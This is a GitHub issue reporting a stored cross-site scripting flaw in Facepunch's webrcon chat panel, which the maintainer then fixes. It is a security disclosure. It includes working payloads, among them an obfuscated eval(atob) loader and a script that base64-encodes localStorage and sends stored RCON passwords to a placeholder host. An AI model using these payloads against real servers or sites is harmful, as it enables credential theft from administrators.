search

Facepunch / webrcon

Game server rcon, using websockets
MIT License
124 stars 57 forks source link

Cross-Site Scripting Vulnerability on Administrator Chat Message, Exploitable to Steal Server Credentials #32

Closed samwcyo closed 3 years ago

samwcyo commented 3 years ago

Summary

There is a cross-site scripting vulnerability when loading messages sent from the RCON panel. An attacker can deploy a Rust server, add the poisoned XSS message to the Rust chat, then trick a victim into automatically logging in and loading in the poisoned message which has the capability to retrieve the stored server credentials in the "localStorage" object.

Steps to Reproduce - alert prompt

  1. Login to your own rust server
  2. Browse to "http://facepunch.github.io/webrcon/#/YOUR_HOST/chat"
  3. Send the following message in chat from the RCON console...
<img/src='x'/onerror='alert(1)'/>
  1. Observe the alert prompt. Additionally, refresh the page and observe the alert prompt

Steps to Reproduce - exfiltrating password

An attacker could host the following script on their HTTP server...

steal=btoa(JSON.stringify(localStorage))
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://YOUR_HOST/?x='+steal, true);
xhr.send();

Which would be stored on the service by sending the following message with the script source pointed towards the attacker controlled script...

<img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vWU9VUkhPU1QiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))>

Then, once the message has been sent to their own server, tricking a victim into loading the payload via the following attacker controlled page:

<iframe src="http://facepunch.github.io/webrcon/#/YOUR_HOST/info?password=password"></iframe>
<iframe src="http://facepunch.github.io/webrcon/#/YOUR_HOST/chat"></iframe>

Which would exfiltrate the password by sending an HTTP request like this:

GET /?x=eyJwcmV2aW91c0Nvbm5lY3Rpb25zIjoiW3tcIkFkZHJlc3NcIjpcIllPVVJfU0VSVkVSXCIsXCJQYXNzd29yZFwiOlwiWU9VUl9QQVNTV09SRCFcIixcImRhdGVcIjpcIjIwMjEtMDItMjBUMDY6MjU6MDEuNDAxWlwifV0ifQ== HTTP/1.1

Impact

An attacker could use this to exfiltrate RCON passwords of anyone using the Facepunch RCON service.

garrynewman commented 3 years ago

Hey - thanks for the write up - I just pushed something that should fix this.

samwcyo commented 3 years ago

Looks fixed to me :) thanks for the quick patch